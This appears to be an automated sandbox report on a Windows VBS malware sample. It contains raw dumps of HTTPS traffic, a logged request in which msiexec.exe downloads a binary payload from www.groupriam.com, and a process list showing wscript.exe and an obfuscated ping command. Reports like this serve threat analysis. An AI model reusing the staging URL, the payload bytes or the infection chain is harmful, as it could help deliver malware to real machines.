                                                                      2024-10-22 13:31:22 UTC16384INData Raw: 4e 71 6b 4f 38 37 7a 56 50 52 67 58 30 47 71 38 48 32 38 31 69 4b 49 6d 58 6f 66 6b 33 6b 64 61 33 2f 31 79 76 55 6e 61 69 56 4b 44 32 7a 4c 70 53 45 42 4d 55 41 39 2b 6d 44 52 74 49 73 6c 41 50 55 67 32 31 71 71 6e 36 53 48 4e 39 79 2b 4d 30 74 58 4a 5a 4b 49 65 77 57 59 72 6f 30 53 6a 66 43 68 77 61 43 6d 6a 7a 54 65 51 39 64 37 78 2b 79 49 2b 55 35 31 31 6d 65 58 41 51 72 49 53 69 69 49 4f 36 7a 66 43 79 2b 58 59 69 36 6c 4b 77 69 72 2b 58 39 68 2f 4a 68 6d 4c 6d 79 54 32 75 7a 36 75 30 32 4c 31 58 48 37 5a 64 6f 6b 61 2f 45 44 55 36 4f 44 57 42 4c 6f 61 4f 78 44 2b 34 32 50 54 78 4d 66 53 58 7a 70 77 53 2b 4e 33 4b 4b 4e 45 32 66 47 69 7a 57 52 38 48 4d 73 45 41 78 35 4d 69 39 55 6c 45 70 4b 71 5a 46 55 70 79 59 39 4d 6f 30 74 35 47 57 68 39 50 30 53
                                                                      Data Ascii: NqkO87zVPRgX0Gq8H281iKImXofk3kda3/1yvUnaiVKD2zLpSEBMUA9+mDRtIslAPUg21qqn6SHN9y+M0tXJZKIewWYro0SjfChwaCmjzTeQ9d7x+yI+U511meXAQrISiiIO6zfCy+XYi6lKwir+X9h/JhmLmyT2uz6u02L1XH7Zdoka/EDU6ODWBLoaOxD+42PTxMfSXzpwS+N3KKNE2fGizWR8HMsEAx5Mi9UlEpKqZFUpyY9Mo0t5GWh9P0S
                                                                      2024-10-22 13:31:22 UTC16384INData Raw: 66 54 39 45 67 69 4b 6c 55 46 7a 72 30 75 32 37 78 56 4d 35 7a 6d 66 74 68 35 56 67 51 42 7a 43 6e 37 44 62 53 48 2f 4f 64 31 77 6b 57 6a 36 32 69 61 46 6a 62 39 57 74 38 6a 33 38 76 6f 55 2b 74 46 38 64 73 74 35 38 4a 52 4e 61 33 4b 76 6c 30 4c 38 31 4f 71 39 4e 6c 65 33 74 39 5a 37 66 48 38 75 39 61 61 70 51 45 63 2b 45 44 30 79 6e 6e 69 67 6c 58 61 70 67 47 4f 51 31 6f 55 79 6e 43 51 4c 55 52 71 4b 34 2f 37 79 6d 4c 72 41 43 4c 62 6e 68 51 2b 6c 7a 57 74 35 30 44 30 53 42 51 37 6a 46 4c 4e 47 49 4e 47 2b 65 51 46 42 5a 43 49 38 48 7a 6e 4d 43 42 75 59 33 65 69 58 2b 56 68 41 6e 6f 7a 44 64 6c 75 2b 65 31 4d 39 6b 4b 30 76 45 7a 53 6d 6a 41 62 4f 30 43 32 71 75 31 59 4d 34 59 4a 68 59 63 52 2b 4c 35 46 46 59 70 67 4f 41 63 41 4f 6b 4e 50 49 41 61 42 6d
                                                                      Data Ascii: fT9EgiKlUFzr0u27xVM5zmfth5VgQBzCn7DbSH/Od1wkWj62iaFjb9Wt8j38voU+tF8dst58JRNa3Kvl0L81Oq9Nle3t9Z7fH8u9aapQEc+ED0ynniglXapgGOQ1oUynCQLURqK4/7ymLrACLbnhQ+lzWt50D0SBQ7jFLNGING+eQFBZCI8HznMCBuY3eiX+VhAnozDdlu+e1M9kK0vEzSmjAbO0C2qu1YM4YJhYcR+L5FFYpgOAcAOkNPIAaBm
                                                                      2024-10-22 13:31:22 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 4e 79 54 45 79 63 6a 36 62 52 54 53 59 65 37 5a 61 6b 7a 32 51 72 49 6e 44 49 4b 36 50 4e 37 53 75 6a 7a 57 75 76 53 53 69 62 31 42 78 65 4c 6b 4a 34 39 5a 47 71 5a 47 6f 65 58 71 69 72 58 65 6f 69 49 76 4e 4d 4b 39 7a 6c 78 44 79 51 4d 76 37 46 39 4c 55 71 57 30 62 5a 4c 4b 48 4e 5a 42 4a 6f 53 5a 47 71 57 4c 58
                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABNyTEycj6bRTSYe7Zakz2QrInDIK6PN7SujzWuvSSib1BxeLkJ49ZGqZGoeXqirXeoiIvNMK9zlxDyQMv7F9LUqW0bZLKHNZBJoSZGqWLX
                                                                      2024-10-22 13:31:22 UTC16384INData Raw: 4b 36 4f 34 6b 32 6c 6b 7a 37 68 4a 64 73 63 7a 6c 42 58 49 4b 79 55 69 4d 76 6f 72 6f 38 31 72 70 78 4c 4f 59 43 76 38 54 47 59 30 34 50 71 79 72 6d 4a 4d 54 68 68 50 76 6d 79 71 69 63 4b 6e 61 46 34 4b 34 65 2b 69 7a 57 51 47 67 38 42 73 72 30 56 4d 30 65 2b 69 7a 57 51 36 39 37 44 63 71 68 59 4a 5a 53 75 6a 4c 30 44 79 74 45 7a 52 37 36 4c 4e 5a 50 62 7a 5a 4d 4e 70 58 45 43 67 4b 71 50 4e 45 64 7a 68 43 6d 5a 37 4e 46 79 38 71 71 47 6d 55 7a 6c 66 53 59 4f 71 6b 57 73 76 49 2f 70 49 72 48 67 59 75 68 76 2f 34 6b 79 66 68 61 50 4e 5a 43 51 74 6a 57 63 76 6f 35 62 6c 47 61 32 72 77 6d 70 56 44 79 58 73 4a 76 52 6d 4b 36 4e 37 65 6c 2b 73 54 4e 45 53 6f 63 31 6b 6c 57 4f 69 35 6f 4d 48 54 4e 45 53 6f 63 31 6b 50 50 32 4a 33 4b 72 65 75 61 4e 58 6f 38 31
                                                                      Data Ascii: K6O4k2lkz7hJdsczlBXIKyUiMvoro81rpxLOYCv8TGY04PqyrmJMThhPvmyqicKnaF4K4e+izWQGg8Bsr0VM0e+izWQ697DcqhYJZSujL0DytEzR76LNZPbzZMNpXECgKqPNEdzhCmZ7NFy8qqGmUzlfSYOqkWsvI/pIrHgYuhv/4kyfhaPNZCQtjWcvo5blGa2rwmpVDyXsJvRmK6N7el+sTNESoc1klWOi5oMHTNESoc1kPP2J3KreuaNXo81
                                                                      2024-10-22 13:31:22 UTC16384INData Raw: 50 34 35 6d 71 42 6e 4b 76 69 5a 47 2b 41 76 72 6a 53 54 6d 47 63 72 36 51 52 54 77 4c 5a 73 39 65 30 77 6b 32 36 73 31 50 47 6a 50 4b 69 55 33 6b 42 72 69 62 61 67 69 50 6c 32 32 65 76 50 6c 32 43 4e 2b 74 4a 62 30 55 65 33 4d 6f 74 4c 35 72 33 71 77 59 63 79 66 50 39 61 4e 7a 63 77 51 39 35 6c 2b 78 66 76 77 74 35 45 41 63 33 45 72 43 39 30 68 37 41 65 76 6a 64 5a 64 41 43 51 71 33 5a 31 49 72 48 54 46 53 4c 31 77 70 6c 46 6b 4b 36 4e 45 2b 58 43 68 7a 57 53 69 59 4a 33 63 48 41 78 64 6f 51 62 6b 68 57 44 43 6c 76 49 51 35 2f 33 67 53 77 4b 63 54 2b 30 6a 6d 38 44 6c 37 6c 72 51 70 62 43 48 70 69 4a 63 74 77 55 55 55 53 58 46 66 30 2b 35 63 35 78 61 2b 53 34 4c 44 7a 39 47 62 38 79 78 31 71 4a 61 50 62 36 6b 67 5a 76 43 66 34 33 63 59 54 78 34 4b 46 41
                                                                      Data Ascii: P45mqBnKviZG+AvrjSTmGcr6QRTwLZs9e0wk26s1PGjPKiU3kBribagiPl22evPl2CN+tJb0Ue3MotL5r3qwYcyfP9aNzcwQ95l+xfvwt5EAc3ErC90h7AevjdZdACQq3Z1IrHTFSL1wplFkK6NE+XChzWSiYJ3cHAxdoQbkhWDClvIQ5/3gSwKcT+0jm8Dl7lrQpbCHpiJctwUUUSXFf0+5c5xa+S4LDz9Gb8yx1qJaPb6kgZvCf43cYTx4KFA
                                                                      2024-10-22 13:31:22 UTC16384INData Raw: 66 53 68 34 51 43 6d 6a 7a 59 77 47 4a 4d 35 6b 6f 69 36 61 5a 69 75 6a 52 4b 56 36 4a 79 44 76 70 76 54 50 5a 43 76 46 53 4c 2f 44 5a 35 39 6c 4b 79 70 41 37 69 71 6a 7a 64 31 6a 44 58 4a 65 72 32 42 4d 6a 56 34 50 56 49 53 71 55 74 6b 58 4e 79 52 4d 70 52 45 75 43 45 61 76 61 5a 7a 76 70 69 6e 4d 5a 43 76 46 39 4b 59 54 54 53 55 79 55 36 44 4e 36 36 36 4f 7a 32 51 72 4a 67 62 76 72 6f 37 50 5a 43 74 4b 43 57 51 72 6f 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                      Data Ascii: fSh4QCmjzYwGJM5koi6aZiujRKV6JyDvpvTPZCvFSL/DZ59lKypA7iqjzd1jDXJer2BMjV4PVISqUtkXNyRMpREuCEavaZzvpinMZCvF9KYTTSUyU6DN666Oz2QrJgbvro7PZCtKCWQrowAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                      2024-10-22 13:31:22 UTC16384INData Raw: 4e 4a 74 32 6d 71 34 43 4e 55 57 64 37 64 58 47 74 6b 51 32 74 6e 35 6a 41 6a 4c 4e 42 6d 6f 44 77 62 30 51 2f 68 4e 51 6c 4b 68 66 39 75 44 4d 52 47 38 59 63 7a 5a 55 37 53 4b 62 57 4d 53 45 46 50 5a 41 64 49 46 69 69 4a 2b 74 64 77 4c 2b 33 2b 34 30 4b 44 53 33 73 4c 75 6e 41 67 69 6f 65 67 6b 6c 39 54 35 2b 4d 2f 4e 77 59 30 78 67 44 38 75 4f 33 42 74 4b 78 68 6b 6f 6f 35 76 61 64 58 2f 41 47 61 70 56 38 73 43 44 2b 6b 79 53 78 6a 70 6f 51 4b 4b 31 74 43 59 30 4c 38 74 68 6d 58 79 31 4f 61 6b 33 63 6d 57 54 4b 4a 68 57 59 59 4e 72 42 39 50 69 30 57 50 58 34 66 76 4d 2f 7a 6a 39 58 59 48 68 72 53 75 49 44 68 2b 32 51 78 43 37 35 6e 58 78 64 36 63 70 31 66 76 6c 77 54 68 4a 58 43 6b 69 4a 35 77 64 4b 6f 54 6c 77 5a 4f 4c 30 4d 48 31 55 65 33 4e 71 74 76
                                                                      Data Ascii: NJt2mq4CNUWd7dXGtkQ2tn5jAjLNBmoDwb0Q/hNQlKhf9uDMRG8YczZU7SKbWMSEFPZAdIFiiJ+tdwL+3+40KDS3sLunAgioegkl9T5+M/NwY0xgD8uO3BtKxhkoo5vadX/AGapV8sCD+kySxjpoQKK1tCY0L8thmXy1Oak3cmWTKJhWYYNrB9Pi0WPX4fvM/zj9XYHhrSuIDh+2QxC75nXxd6cp1fvlwThJXCkiJ5wdKoTlwZOL0MH1Ue3Nqtv


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.549988199.103.62.2054436640C:\Windows\SysWOW64\msiexec.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-22 13:32:15 UTC175OUTGET /zkwqTJp58.bin HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                      Host: www.groupriam.com
                                                                      Cache-Control: no-cache
                                                                      2024-10-22 13:32:15 UTC422INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      content-type: application/octet-stream
                                                                      last-modified: Mon, 21 Oct 2024 13:36:38 GMT
                                                                      accept-ranges: bytes
                                                                      content-length: 336448
                                                                      date: Tue, 22 Oct 2024 13:32:15 GMT
                                                                      server: LiteSpeed
                                                                      vary: User-Agent
                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                      2024-10-22 13:32:15 UTC946INData Raw: 8a 0c 6b 03 55 69 9a eb 91 fd 90 b6 31 b6 8a 36 87 84 49 63 ce 48 d6 66 0e 6d a5 fc 3e 4b 4b 2f cd ec 4c 7f ae e2 aa a6 1e 29 d2 c4 14 b1 4e ab 57 8e bf e3 32 24 f5 b9 46 32 87 bf 36 94 cb 08 42 fe f6 23 9f ed b6 74 f3 12 a8 8a 17 d5 e3 b2 4c 01 be e1 f0 66 09 6b 53 c7 ea dc 7d 74 2e 6a b9 3b d9 ef 0b e9 97 83 a5 9d 54 09 b6 9b 6f c0 06 07 f3 ad 17 17 3c 2f 5c 3e 86 82 08 8d 8d fb 92 55 df 56 4d 66 68 d0 d1 26 05 a2 62 8b c6 67 ac 6f 53 83 9c 34 6b 4a 74 d9 9f 90 9b 42 85 a4 e6 73 63 29 a2 5c 15 31 a0 6c bf 9d f5 9f 90 87 e7 a8 21 89 f8 bc 59 e4 f3 a0 6d f9 a9 3d 8a 0a 18 c8 24 e6 4d 4a 7d a8 ad 18 ce 30 52 38 96 ef c7 70 8a d4 53 28 07 f0 33 54 87 99 52 de 53 fa da 3b c1 28 e9 7f d6 19 ae 20 2b 27 67 cc f6 c4 ae 07 54 d5 5b b8 98 07 52 60 a3 71 55 e8 6c
                                                                      Data Ascii: kUi16IcHfm>KK/L)NW2$F26B#tLfkS}t.j;To</\>UVMfh&bgoS4kJtBsc)\1l!Ym=$MJ}0R8pS(3TRS;( +'gT[R`qUl
                                                                      2024-10-22 13:32:15 UTC14994INData Raw: c2 82 ab c2 4b 66 19 a3 65 99 2e eb 72 48 97 c3 79 e6 57 34 fd ca 0d 47 f0 9c 65 f2 11 88 0a 5d 58 f5 92 d8 58 15 9a 64 4a 7e 4c a9 49 1c 22 f8 36 9f 4d 56 5d 5e 8e 45 8c 2e f8 76 7c a3 33 64 88 f5 33 00 bf 09 8c c4 9e 72 d2 cc c3 3e 94 8f 86 f5 d4 34 f0 65 dd 97 35 db 74 5a 3a 5b 25 52 86 59 c5 4c c8 a3 0b d6 3e a5 ea 32 eb ee 07 ea 8a f2 6a 80 7b 01 bc 22 6d ef d1 b2 6f b9 7b e7 22 25 bb 2c d0 1c 7b 9e 4c 23 42 11 cc 80 c6 79 fc b8 38 60 b2 b0 de 15 c0 90 69 3b fe e6 e1 57 0c dd 27 58 18 64 7a df 4b b3 eb 14 fe 13 2e ec f5 44 b9 ca 79 39 b9 ce 33 16 74 df 3c 16 55 a5 aa fb a9 ca b5 a7 09 d7 9b 03 95 20 71 d9 73 63 a4 b9 ab 73 c8 6c 8e d0 e2 69 12 f6 ab 5d c8 ac 50 e3 ad c7 cb 7b 7b d5 d0 34 16 62 ac 89 cf d8 0f e9 e0 5b 38 a8 09 3d c1 f1 e6 25 e8 aa 94
                                                                      Data Ascii: Kfe.rHyW4Ge]XXdJ~LI"6MV]^E.v|3d3r>4e5tZ:[%RYL>2j{"mo{"%,{L#By8`i;W'XdzK.Dy93t<U qscsli]P{{4b[8=%
                                                                      2024-10-22 13:32:15 UTC16384INData Raw: 02 0d 64 28 69 ca 3d 91 72 7f 0d 77 70 1c 9c 75 67 eb 54 6f 5d 66 89 db c7 f8 34 e0 e9 dd b3 1c fe 26 b5 76 83 46 c5 2f ab 5e 47 49 a5 af e4 80 1b 79 7d 6a 91 ad e6 02 cb be 54 1e 29 27 73 2b fe 67 47 86 f0 f2 88 fe 3a e2 0a ae af 5b b2 a9 9a de f1 04 22 e7 53 09 0f 9a 32 e1 3b d7 e8 e8 a8 b0 32 65 2f a6 39 ff 14 f0 a6 88 b9 1e 73 1d 2a ee 98 08 f9 04 15 6b 45 48 f0 17 89 9b 1d bf 66 3e 42 6d ee 4d 28 e1 d1 c3 fb f9 6c e9 46 51 87 84 42 22 45 0e b2 71 54 22 56 3c 59 69 d1 8f 6f b0 ec 4f 85 14 f1 74 05 66 2a be eb d3 4f 24 d9 35 f8 9e 34 ff 4c 5d 54 93 b7 c1 3c fc 97 51 52 aa 9c b9 59 d2 89 9f d0 81 3b 24 60 9f 0c e2 62 80 6d e4 4d e1 3e a1 3f 66 ca 43 12 d7 90 65 69 9a c8 ea 61 fd 5f 7c da 67 cb 9e 88 0b 2e 47 33 96 e8 9d d0 bc 74 8b 6f 21 81 f0 43 dc 08
                                                                      Data Ascii: d(i=rwpugTo]f4&vF/^GIy}jT)'s+gG:["S2;2e/9s*kEHf>BmM(lFQB"EqT"V<YioOtf*O$54L]T<QRY;$`bmM>?fCeia_|g.G3to!C
                                                                      2024-10-22 13:32:15 UTC16384INData Raw: 10 6a b1 50 c6 f3 88 6e 94 89 38 52 f3 14 32 d4 6b e7 52 a8 59 85 91 0d 59 24 40 40 d9 89 6f 91 88 9d 32 d2 dd 2e f9 17 8c 07 cb b7 ec d3 1f 5c d2 3e b1 d8 b8 6b 6c 07 6a fb ba a1 80 05 5c d3 e5 b3 f0 71 a6 0b 77 2b ec 42 26 d2 64 c4 2e 6d be 4b a5 b5 88 92 d9 02 39 a2 7e 6d df 4c f7 1f a1 1b b5 b8 3a 2c 95 84 ec f6 23 0d 0a 83 6d 94 fb 78 90 a1 94 32 fd e2 b3 bd 7a f7 7f b5 cb 44 a8 fb a3 88 f1 4b 4b fe b6 23 0f c2 2f 45 df d6 e7 d8 5f 58 d5 92 57 a9 ad 0f 19 8f 33 b0 89 90 05 4d df ae 33 da 5c 01 2f 6b ff 94 82 5c 77 b1 a4 52 df 5f 91 8f 6a ae b9 3b b6 aa 48 72 c1 71 c0 c2 35 ef 51 34 3f 6b 3a fc 8c d3 b4 da 1d b6 20 5f cf 84 fe ae 62 e4 21 ef 84 ca b2 5d 20 18 e8 46 2d 3b ab 1b 06 73 54 f2 aa af a7 b2 82 ad 56 08 08 56 f3 40 46 24 1f 4a 9e 4e db 1d ea
                                                                      Data Ascii: jPn8R2kRYY$@@o2.\>klj\qw+B&d.mK9~mL:,#mx2zDKK#/E_XW3M3\/k\wR_j;Hrq5Q4?k: _b!] F-;sTVV@F$JN
                                                                      2024-10-22 13:32:16 UTC16384INData Raw: c0 5e f0 c1 3d cf 28 0b 2c 44 19 44 b6 2d 87 18 88 98 02 5b 08 29 95 de 93 01 d8 51 c5 f6 63 b0 f1 eb 1e ed ce 2c 9b 9e 28 eb 8d cb 27 51 85 aa 54 0b ba 94 3e fb 08 57 68 df 6a a3 67 26 ce f9 e3 21 38 d9 5a 61 8a be 39 05 8c 68 61 ac 19 ec 56 bd 2b e7 2c 74 e8 12 87 d7 70 c0 b0 fd 36 59 7e 8f 79 97 15 89 76 40 1c 43 d9 b4 24 70 1f 3d c1 70 7c 5d 32 92 20 6d d7 b3 f2 85 0a 4f 94 13 b4 5d a7 d2 7a 07 19 9f 3d 9b 81 49 a4 4d cc 04 f7 75 bd 02 87 31 a4 a0 4e 69 1c 58 18 60 ba 4c 14 d5 0d 89 fa e1 b8 4f 40 39 5d 3c cf 70 43 10 76 f6 c3 1e d6 a2 e7 b6 3f 21 44 45 ac ff dc 48 c9 11 6f ff f7 40 89 20 d4 94 f8 a4 ff c6 92 f8 e7 fe 49 6d 6d db 83 f6 d1 60 f6 7b 81 35 4f 07 0e 88 e7 ff c9 55 22 05 aa 59 72 36 e6 26 20 66 7b 9d 35 03 8b 72 e5 d3 b2 e1 15 84 68 5d a4
                                                                      Data Ascii: ^=(,DD-[)Qc,('QT>Whjg&!8Za9haV+,tp6Y~yv@C$p=p|]2 mO]z=IMu1NiX`LO@9]<pCv?!DEHo@ Imm`{5OU"Yr6& f{5rh]
                                                                      2024-10-22 13:32:16 UTC16384INData Raw: c0 33 43 73 92 48 44 77 78 36 7c d3 9a 64 69 8c 16 05 e2 7f b4 47 e9 1e 8e 72 f6 f9 68 4a 3a 7b a7 42 c9 26 8a 20 53 04 17 de 6c 83 d0 5b a6 58 b0 22 79 ea 64 74 7b cb d8 03 8c 22 b7 6a 22 ea b4 9b 92 70 ba fc 9a b8 e0 94 74 7b 6a cf 7f ea 5a 21 93 b4 02 e5 fa 6f e9 fd f5 42 91 d6 ae 0b b4 b8 9f 9d e1 5d ba 2d 8e b7 7e 1a e9 8e 87 91 8a f3 d8 d5 9e 7f bf aa b1 20 20 e8 d2 2f 5c 7a 75 bd 24 c4 34 e1 64 90 2e 53 6b 5d 1c db 09 97 19 ed b9 cf e6 e6 9c d4 1e 2c c0 08 86 5e 99 8e e8 df 00 fd 41 5d 39 fd 28 ed 58 1c 59 ae 30 3a a1 e2 cd d4 dd ad fb 16 b2 01 c8 f9 cc e5 df 9a 0d e6 80 52 d9 d4 4c bc 3b 3c c8 9a 4e 28 00 8c 4d 6b 6f ee 63 73 f9 dd 0b 31 31 0d 00 a8 ad 7c 65 65 bf fe b6 c6 7a f5 03 9d 34 7f 70 53 72 63 54 50 bb f9 ad 6d f6 53 ae 54 12 f3 f4 b8 4d
                                                                      Data Ascii: 3CsHDwx6|diGrhJ:{B& Sl[X"ydt{"j"pt{jZ!oB]-~ /\zu$4d.Sk],^A]9(XY0:RL;<N(Mkocs11|eez4pSrcTPmSTM
                                                                      2024-10-22 13:32:16 UTC16384INData Raw: ea 50 f1 83 6c 44 b2 e9 23 64 7f 38 50 f3 b4 f3 57 7c dc 0b 51 c3 14 f9 6e 2b 99 58 77 8b 4a ea b6 43 a2 e7 da 5a 6e 2f b9 27 6c 18 7f dd 28 3a eb 66 04 1b a4 95 52 9f ae dd b8 f9 e8 16 38 20 75 21 9d 9e 7a 7c a5 0a 0d a0 f1 44 b5 85 55 ab 11 fe 34 65 ad 1a a4 5d 36 3c 86 50 c1 53 26 ce 3c f8 69 2d 1b 17 e9 b3 9a c7 62 64 11 ed f4 85 b4 68 9f b7 11 5d 76 02 14 41 c0 ee a1 38 03 fb 8d d2 74 32 5f 79 1d 11 36 f7 d6 73 ec 64 38 19 57 2c 74 3a f1 a1 46 de 14 48 40 57 cc 85 dd 1f 70 c4 a8 92 fb 80 d4 75 26 85 11 5f fe 59 86 78 c5 79 20 83 6c 72 e1 39 9b b7 21 15 d1 a1 00 df b5 24 2b 4b bb f0 f9 33 a3 8b 8a d1 be e2 7b a6 4f b7 0d c5 d5 1b 74 00 b7 47 66 8f c3 af 2d 77 ec 05 38 61 c2 e8 cf ed 64 c0 da 54 13 9c b7 58 e0 bc 75 6b 4e 81 a8 ef db 07 99 90 85 ae b7
                                                                      Data Ascii: PlD#d8PW|Qn+XwJCZn/'l(:fR8 u!z|DU4e]6<PS&<i-bdh]vA8t2_y6sd8W,t:FH@Wpu&_Yxy lr9!$+K3{OtGf-w8adTXukN
                                                                      2024-10-22 13:32:16 UTC16384INData Raw: 4b 3e 3f ea 5e c9 d1 50 c4 35 23 3c 72 11 52 5b a1 41 cd 9a d1 97 ba 6e ec a2 e4 ad d3 b3 e9 0f 7d 94 56 b1 6e 09 20 ed e3 04 4e 66 31 07 cf c3 e7 01 3c a8 45 7c 54 f3 bc 62 63 08 fc c8 ff 11 14 fc 5f b5 ea 43 ba 6e 3e e0 23 97 ab 45 a0 28 29 2e 14 97 7e 79 3e 26 89 a0 5c 00 4d 32 1c c9 71 50 24 5a ca d6 b5 7a ec 80 04 0d 72 3b 0c ef 8d 90 8d 85 08 a3 d8 c2 48 c5 dc b8 ef 75 72 02 7a fa 07 4e c8 5e 57 41 40 b1 03 21 cd c3 57 34 6d d0 e2 c4 20 f4 e8 70 b8 8e 71 43 2f 95 81 ce 52 26 a3 3b 22 92 4f 45 56 94 56 c3 2f 00 47 dd 1c 1a 09 a4 f7 48 96 a3 12 3d fe 7f 67 c8 58 95 66 5c 42 ea ac eb e2 3b b0 bc 30 5d d4 a1 ad d9 fe 66 a5 97 ff 25 9f a5 57 ce 39 00 03 06 dc b9 ac d7 97 6d 1e 8c 6b 36 66 94 b0 ed f2 04 ef ae 4e 85 8c 36 c8 71 ab 3e c3 f2 4f f1 d8 be 4a
                                                                      Data Ascii: K>?^P5#<rR[An}Vn Nf1<E|Tbc_Cn>#E().~y>&\M2qP$Zzr;HurzN^WA@!W4m pqC/R&;"OEVV/GH=gXf\B;0]f%W9mk6fN6q>OJ
                                                                      2024-10-22 13:32:16 UTC16384INData Raw: 1f 73 18 f8 1a d0 01 a0 93 86 b8 1a 56 0e f7 8b fa a1 e3 d1 bb 3f 55 1f 24 8d 79 93 cc f8 8f df 5b 7d 0b 88 c9 7e 2d 9d 08 93 d5 75 27 ee 9f c6 2f 47 f1 27 53 1f ff d4 90 38 a2 9a c7 8d 0b 83 26 0e 56 dc b2 00 06 5e 1c b7 35 53 6d 8f ce f3 a3 59 17 2c 61 07 cb 48 90 c6 24 46 9f 9e d0 7e 23 a4 58 da c3 57 0a ac 36 03 33 0a a6 e8 27 ae ae 6c 6e a6 fa 5b d0 a3 8f cb de a7 21 97 47 97 f2 fc 96 fe 85 d0 5d 7a c7 9e 75 a3 52 0b da 2b 0a 91 87 d3 e3 48 b6 15 e0 ff 9f f4 3c 8e 10 62 2b f0 a7 9b 42 c7 a6 05 27 e6 1e fc 82 50 b4 90 95 be 45 ab ca 23 be 3d 96 e0 57 09 34 c8 65 4b 25 2a a7 54 2f 67 73 74 41 c1 b6 70 01 49 78 28 44 f8 0d ae 99 7c eb 97 6f 1d 9e e7 b7 c3 8d 28 cf 24 d0 02 0b 2b 54 81 d8 f1 9a 64 fc 85 6c 23 94 1e c1 48 b2 54 34 55 a0 47 bc 45 85 28 55
                                                                      Data Ascii: sV?U$y[}~-u'/G'S8&V^5SmY,aH$F~#XW63'ln[!G]zuR+H<b+B'PE#=W4eK%*T/gstApIx(D|o($+Tdl#HT4UGE(U
                                                                      2024-10-22 13:32:16 UTC444INData Raw: cb 9c 30 71 f7 ff 15 c6 f7 88 54 7f bf e9 6d 78 45 4b 5b 53 b2 9c 28 0f 16 82 6b c6 11 03 07 42 8f a6 80 ce eb 8c cd a0 e0 ed 78 67 fa a7 11 11 8a 9b 36 a9 eb 97 80 f6 cd 5b 1c b8 42 2c 71 cb db bb 61 c6 09 e2 9b cb 88 f2 d6 68 57 9b c1 5f e9 94 3f fb 4f 32 10 25 24 9e ab 56 d1 cc 1b c0 49 9b 82 6b 2c 40 f3 63 f3 68 2a ec cd 75 98 9c 4b 2e c1 72 76 2f 52 cf 21 82 25 cd 8e 8d 12 dc 2b 5e 10 ac 47 5e 8b 08 b0 bb 10 1b d7 e6 20 3b 24 1a bd 5b dd 17 62 eb 35 5c 0e 66 6a 46 9e 15 ea a2 ff 8e 6b 11 5a a0 10 01 06 1c 7b 26 97 4f fe 08 c7 b0 cc 9c 9c 17 3b 4d f2 a2 bf fa be bd eb 7c 73 c6 9d 9d 91 48 07 80 4c 91 7d 90 29 2a 15 c5 5e 31 5e 36 95 64 f2 d0 8e b0 16 9b 2f b6 51 35 80 b5 f4 f4 73 a0 b3 5e 31 9b 51 78 5d a2 4c b4 a2 3a 35 c9 50 1a 5a 2d a2 f9 76 38 36
                                                                      Data Ascii: 0qTmxEK[S(kBxg6[B,qahW_?O2%$VIk,@ch*uK.rv/R!%+^G^ ;$[b5\fjFkZ{&O;M|sHL})*^1^6d/Q5s^1Qx]L:5PZ-v86


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:09:31:15
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs"
                                                                      Imagebase:0x7ff6ec390000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:09:31:15
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\PING.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:ping gormezl_6777.6777.6777.677e
                                                                      Imagebase:0x7ff7f6580000
                                                                      File size:22'528 bytes
                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:09:31:15
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
